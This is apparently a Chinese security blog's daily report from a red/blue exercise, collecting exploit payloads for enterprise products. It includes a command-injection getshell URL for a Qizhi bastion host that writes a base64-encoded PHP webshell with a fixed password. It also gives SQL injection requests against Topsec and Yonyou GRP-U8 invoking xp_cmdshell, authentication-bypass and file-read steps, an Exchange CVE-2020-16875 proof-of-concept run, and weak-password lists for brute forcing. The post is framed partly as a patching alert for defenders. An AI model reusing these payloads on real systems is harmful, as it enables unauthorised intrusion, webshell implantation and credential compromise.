HW平安夜: 09/12 漏洞PAYlOAD

0912HW日报

蹲守机房的第二天，机房很冷，冷的要命，尤其临近饭点还有点饥寒交迫的感觉。但是不敢松懈，要提醒自己时刻保持警惕，随时等候拔线的指令。

今天很安静，但是请别大意

今天 ，你拔线了么？

以下转载自：渗了个透

《HW平安夜: 09/11 漏洞PAYlOAD》

《HW平安夜: 09/12 态势感知》

0、齐治堡垒机前台远程命令执行漏洞（CNVD-2019-20835）

未授权无需登录。

1、访问 http://10.20.10.11/listener/cluster_manage.php  :返回 "OK".

2、访问如下链接即可getshell，执行成功后，生成PHP一句话马

3、/var/www/shterm/resources/qrcode/lbj77.php  密码10086

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}

这里假设10.20.10.10为堡垒机的IP地址。

1、天融信TopApp-LB 负载均衡系统Sql注入漏洞

POST /acc/clsf/report/datasource.php HTTP/1.1Host: localhostConnection: closeAccept: text/javascript, text/html, application/xml, text/xml, */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Accept-Language: zh-CN,zh;q=0.9Content-Type: application/x-www-form-urlencoded
t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

网友称以下两个历史漏洞仍然可以复现。

https://www.uedbox.com/post/21626/

https://www.uedbox.com/post/22193/

2、用友GRP-u8 注入

POST /Proxy HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)Host: localhostContent-Length: 341Connection: Keep-AliveCache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

3、绿盟UTS综合威胁探针管理员任意登录

逻辑漏洞,利用方式参考（https://www.hackbug.net/archives/112.html）

1、修改登录数据包 {"status":false,"mag":""} -> {"status":true,"mag":""}

2、/webapi/v1/system/accountmanage/account接口逻辑错误泄漏了管理员的账户信息包括密码（md5）

3、再次登录,替换密码上个数据包中md5密码。

4、登录成功。

4、WPS Office 图片解析错误导致堆损坏，任意代码执行。

看上去(算了看不懂... ,漏洞利用可能导致拒绝服务。

相关参考:

http://zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html

以上内容均为网友分享,作者并未实际复现。

5、「最新」泛微OA云桥任意文件读取

来源: 微步情报局

未授权任意文件读取,/wxjsapi/saveYZJFile接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。

1、 downloadUrl参数修改成需要获取文件的绝对路径,记录返回包中的id值。

2、通过查看文件接口访问 /file/fileNoLogin/id

修复建议:

关闭程序路由 /file/fileNoLogin

6、宝塔面板phpMyadmin未授权访问

来源: https://mp.weixin.qq.com/s/3ZjwFo5gWlJACSkeYWQLXA

前段时间在朋友圈和微信群里火热不行的宝塔数据库面板未授权无需登录,以下是存在安全问题的版本。

- Linux正式版7.4.2

- Linux测试版7.5.13

- Windows正式版6.8

1、宝塔默认phpMyadmin端口就是888 而这个漏洞排查方式极其简单 172.10.0.121:888/pma

2、如果宝塔是存在安全问题的版本,那就会直接出现phpMyadmin面板页面。

7、CVE-2020-16875: Exchange Server 远程代码执行漏洞

更新公告:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875

微软公告说的很明显,只需要一个Exchange用户账号。就能在Exchange服务器上执行任意命令。

https://srcincite.io/pocs/cve-2020-16875.py.txt

https://srcincite.io/pocs/cve-2020-16875.ps1.txt

researcher@incite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass> <cmd>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123### mspaint

researcher@incite:~$ ./poc.py 192.168.75.142 [email protected]:user123### mspaint
(+) logged in as [email protected]
(+) found the __viewstate: /wEPDwUILTg5MDAzMDFkZFAeyPS7/eBJ4lPNRNPBjm8QiWLWnirQ1vsGlSyjVxa5
(+) triggered rce as SYSTEM!

8、PhpStudy nginx解析漏洞

小皮面板 <= 8.1.0.7: 啊这。不是吧不是吧,这都能甩锅到我头上。我裂开了呀!

其实这个漏洞确实不是小皮的问题,而是2017年就出现的nginx解析漏洞。

1、利用条件就只需要把php恶意文件上传(oss不算!)到服务器。

<?php phpinfo();?>

2、通过 /x.txt/x.php 方式访问上传的图片地址,啪嚓! 就解析了php代码。

9、一些弱口令字典

使用范围不限于系统服务、应用服务、应用程序,可以用这些生成字典对内网资产巡检。

泛微OA默认system账号: system/system

Apache DolphinScheduler: admin/dolphinscheduler

1、账号

[email protected]

superadmin

admin123

xadmin

system

admin

root

2、密码

$companyName$@2020

$companyName$2020

$companyName$123

admin123

12345678

123456

admin

root

为啥没写administrators, 因为上面都是我随便想出来的,这个我记不住。

回顾一下HW 2020/09/11:

第一天都有陆续爆出很多安全厂商安全漏洞,其中大部分都是历史漏洞,这些高危问题简直就是能够一步到位,直接打进内网,所以我们也安排小编把这些漏洞贴放出来,让甲方也能注意一下这些问题。

虽然是历史漏洞也不排除客户没有做到全面的升级,正好也可以排查一遍。

还有消息说是蜜罐失守,直接被打出局了 //不管是不是真假做好相关措施总是对的。

hw开始之前有很多人都进了“协同banIP蓝队都是第1”这种群组团ban红队IP,让红队的哥哥们属实没有劲。

但是给组团归组团,内部机密文件一定不要发到这些群里去啦,不然可就要卷铺盖走人啦。

最后还是要劝大家保重身体,尽量别超负荷工作。

多喝菊花茶,对胃好。

往期文章推荐：

2020HW小技巧总结（献上本人收藏多年的子域名字典）

2020HW红方漏洞利用总结（一）

hvv最新情报

红队防猝死手册

红队渗透手册之信息收集篇

HW演习前的自我信息排查